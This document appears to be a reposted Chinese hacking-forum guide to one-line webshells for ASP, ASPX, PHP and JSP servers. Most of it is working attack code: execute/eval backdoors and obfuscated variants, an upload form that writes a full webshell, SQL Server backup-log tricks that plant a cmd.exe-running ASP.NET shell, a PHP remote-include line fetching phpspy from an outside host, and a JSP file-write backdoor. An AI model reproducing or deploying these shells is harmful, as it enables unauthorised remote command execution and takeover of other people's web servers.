一句話木馬的適用環(huán)境：
1.服務(wù)器的來賓賬戶有寫入權(quán)限
2.已知數(shù)據(jù)庫地址且數(shù)據(jù)庫格式為asa或asp
3.在數(shù)據(jù)庫格式不為asp或asa的情況下，如果能將一句話插入到asp文件中也可
一句話木馬的工作原理：
"一句話木馬"服務(wù)端（本地的html提交文件）
就是我們要用來插入到asp文件中的asp語句，（不僅僅是以asp為后綴的數(shù)據(jù)庫文件），該語句將回為觸發(fā)，接收入侵者通過客戶端提交的數(shù)據(jù)，執(zhí)行并完成相應(yīng)的操作，服務(wù)端的代碼內(nèi)容為 <%execute request("value")%> 其中value可以自己修改
"一句話木馬"客戶端（遠程服務(wù)器上被插入一句話的asp文件）
用來向服務(wù)端提交控制數(shù)據(jù)的，提交的數(shù)據(jù)通過服務(wù)端構(gòu)成完整的asp功能語句并執(zhí)行，也就是生成我們所需要的asp木馬文件
現(xiàn)在先假設(shè)在遠程主機的TEXT.ASP(客戶端）中已經(jīng)有了<%execute request("value")%>這個語句.)在ASP里<%execute ............")%>意思是執(zhí)行省略號里的語句.那么如果我寫進我們精心構(gòu)造的語句,它也是會幫我們執(zhí)行的.就按照這上面的思路,我們就可以在本地構(gòu)造一個表單內(nèi)容如下:(//為注釋)
<form action=http://主機路徑/TEXT.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")//建立流對象
lP.Open //打開
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字體標準
lP.writetext request("newvalue")
lP.SaveToFile server.mappath("newmm.asp"),2 //將木馬內(nèi)容以覆蓋文件的方式寫入newmm.asp，2就是已覆 蓋的方式
lP.Close //關(guān)閉對象
set lP=nothing //釋放對象
response.redirect "newmm.asp" //轉(zhuǎn)向newmm.asp
</textarea>
<textarea name=newvalue cols=120 rows=10 width=45>添入生成木馬的內(nèi)容</textarea>
<center><br>
<input type=submit value=提交>
</form>
表單的作用就是把我們表單里的內(nèi)容提交到遠程主機的TEXT.ASP這個文件.然后因為TEXT.ASP里有<%execute request("value")%>這句,那么這句代碼就會執(zhí)行我們從表單里傳來的內(nèi)容哦.(表單名必須和<%execute request("value")%>里的VALUE一樣,就是我用藍色標記的那兩處,必須相等)
說到這里大家是不是清楚了.我們構(gòu)造了兩個表單,第一個表單里的代碼是文件操作的代碼(就是把第二個表單內(nèi)的內(nèi)容寫入在當(dāng)前目錄下并命名為newvalue.ASP的這么一段操作的處理代碼)那么第二個表單當(dāng)然就是我們要寫入的馬了.
具體的就是下面這一段:
set lP=server.createObject("Adodb.Stream")//建立流對象
lP.Open //打開
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字體標準
lP.writetext request("newvalue")
lP.SaveToFile server.mappath("newvalue.asp"),2 //將木馬內(nèi)容以覆蓋文件的方式寫入newmm.asp，2就是已覆 蓋的方式
lP.Close //關(guān)閉對象
set lP=nothing //釋放對象
response.redirect "newmm.asp" //轉(zhuǎn)向newmm.asp
這樣的話第二個表單的名字必須和lP.writetext request("newvalue") 里的Newvalue一樣,就是我用紅色標注的那兩處.
至此只要服務(wù)器有寫的權(quán)限你表單所提交的大馬內(nèi)容就會被寫入到newmm.asp中。即newmm.asp為我們的shell地址。
http://www.hxhack.com/bbs
關(guān)于服務(wù)器錯誤：
經(jīng)常,當(dāng)我們在一個asp文件內(nèi)添加了一句話后,就會出現(xiàn)類型不匹配的錯誤:
Script error detected at line 1.
Source line: execute request("nettoo")
Description: 類型不匹配: 'execute'
這個如何解決呢?
想出了一個好辦法,只要用"eval"替換掉"execute"服務(wù)端,就不會出錯了!
用一句話客戶端連接，加入容錯語句，你可以把它插入到任何ASP文件而不會像以前一樣出錯。
<%On Error Resume Next execute request("value")%>
常見asp一句話木馬的變體：
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>

<%ExecuteGlobal request(chr(35))%>
<%ExecuteGlobal request(chr(35))%>
<%execute request("#")%>
<%execute request(chr(35))%>
<script language=VBScript runat=server>if request(chr(35))<>"""" then
ExecuteGlobal request(chr(35))
</script>
<%ExecuteGlobal request(chr(35))%> 9月30日
<%eval request("#")%>
數(shù)據(jù)庫里插入
┼攠數(shù)畣整爠煥敵瑳∨∣┩愾
utf-7的馬
<%@ codepage=65000%>
<% response.Charset="936"%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

各種環(huán)境下的一句話木馬：
aspx
1.相當(dāng)于ASP的一句話木馬:
程序代碼
alter database pubs set RECOVERY FULL--
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%> ')
backup log pubs to disk = 'd:\test11.aspx'
//這個和asp的一樣，客戶端post一個變量l 把木馬代碼丟在變量l里面就ok了 這個是類似asp的一句話木馬。
//mu.aspx.htm 客戶端:(提交后訪問:http://IP/images.aspx)
<form action=http://192.168.2.100/asp/mu.aspx method=post>
<b>在下面輸入大馬內(nèi)容:</b><br>
<textarea name=l cols=120 rows=35 width=45>
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text)
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">",">")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script><html><head>
<title>ASP.NET Shell for WebAdmin2.X Final</title>
<meta http-equiv="Content-Type" c /></head><body>
<form runat="server">
<asp:Label id="L_p" style="COLOR: #0000ff" runat="server" width="80px">;Program</asp:Label>
<asp:TextBox id="xpath" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox><br />
<asp:Label id="L_a" style="COLOR: #0000ff" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox><br />
<asp:Button id="Button" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #719bc5" runat="server" Width="100px" Text="Run"></asp:Button><p>
<asp:Label id="result" style="COLOR: #0000ff" runat="server"></asp:Label> </p></form></body></html>
</textarea>
<center><br>
<input type=submit value=提交>
2、下面這個是我找網(wǎng)上的asp.net的上傳文件程序，修改精簡了下，也可以用：
程序代碼
drop table pubs.dbo.cmd
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<script language="c#" runat="server">private void bc(object o,EventArgs e) {string u="files";string filename;int pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos + 1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><form method="post" runat="server"><input type="file" id="f" runat="server"/><input type="submit" value="ss" runat="Server" /></form>')

backup log pubs to disk = 'c:\inetpub\wwwroot\test11.aspx'

PHP
本文沒有什么特別之處，僅求拋磚引玉。并送給和我一樣菜的在PHP門邊徘徊的朋友。
剛學(xué)PHP沒幾天，我就急于功成，所以有錯誤及不足之處請大家積極指出。
PHP語法的強大是ASP望塵莫及的，僅一個:<? phpinfo();?>就可以刺探整個服務(wù)器的配置。運行cmd，上傳文件等，都是非常簡便的，現(xiàn)在用的好的PHP木馬，莫過于angel的phpspy了。昨天hak_ban問怎么給PHP木馬加密，我還沒想到，但是對于寫一個微型PHP木馬，我想還是很難被殺的。
這里簡單探討一下幾個函數(shù)可以作為木馬的使用：
1． 可以運行外部命令的幾個函數(shù)：system,passthru,exec,shell_exec,popen。
例：只要將<?system($cmd);?>等保存為cmd.php及可實現(xiàn)運行外部命令的功能。這幾個函數(shù)可以說是最早的微行php木馬了，所以一般虛擬主機的設(shè)置也會將這些函數(shù)屏蔽的。
2．還記得WDB論壇的style.php的漏洞嗎？我們可以利用這個做個很難被殺的小木馬。如下：
<?php include($include);?>
將其保存為1.php ，我們就可以調(diào)用其他不支持php服務(wù)器里的.php木馬（如phpspy.php）來達到我們的目的：http://target.com/1.php? Include=http://www.xxx.com/phpspy.php
這里http://www.918x.com是不支持php的，否則將會在http://www.xxx.com這臺服務(wù)器運行phpspy.php,而不是目標服務(wù)器。
3． 這個還是angel在Discuz 2.2F的攻擊中給我們的一個非常好的上傳木馬，我沒有改：
<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
將其保存為up.php后，在本地提交表單：
<form ENCTYPE="multipart/form-data" ACTION="http://目標服務(wù)器/up.php" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
就可以把大個的php木馬上傳上去。
4． 我一直在想有沒有同冰狐浪子的那個ASP一句話木馬一樣通過本地表單提交運行的PHP木馬。終于找到了函數(shù)：eval，在PHP4中文參考手冊上它的語法說明：
語法: void eval(string code_str);
內(nèi)容說明：本函數(shù)可將字符串之中的變量值代入，通常用在處理數(shù)據(jù)庫的資料上。參數(shù) code_str 為欲處理的字符串。值的 注意的是待處理的字符串要符合 PHP 的字符串格式，同時在結(jié)尾處要有分號。使用本函數(shù)處理后的字符串會沿續(xù)到 PHP 程序結(jié)束。
我們可以在目標主機上保存:<?eval($cmd);?>為一個PHP文件（我想也可以插在PHP任意文件里）。然后通過本地提交來達到目的，但與ASP不同的是，在magic_quotes_gpc = on的時候，過濾的很多的字符，使得這個使用功能大大的縮小。
對于這個PHP木馬本地表單我做了很多次，還沒有成熟的代碼。還請高手指教。寫好后會奉獻給大家的。但是eval這個函數(shù)可以做微型PHP木馬是無須質(zhì)疑的。
Ps:寫完后，有人告訴我，其實高手早就有微型的PHP木馬了，只是沒有公開。哎，我好郁悶啊，研究的都是人家早就有了的成果。不管怎么樣，和大家分享一下我的研究，希望能得到幫助和指教。

JSP
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
這個 后門估計不用我說了吧.還是提示一下咯.保存為1.jsp 提交url!
http://localhost/1.jsp?f=1.txt&t=hello
然后:http://localhost/1.txt 就出來了 內(nèi)容為 hello .....
總結(jié)完畢---轉(zhuǎn)

最新評論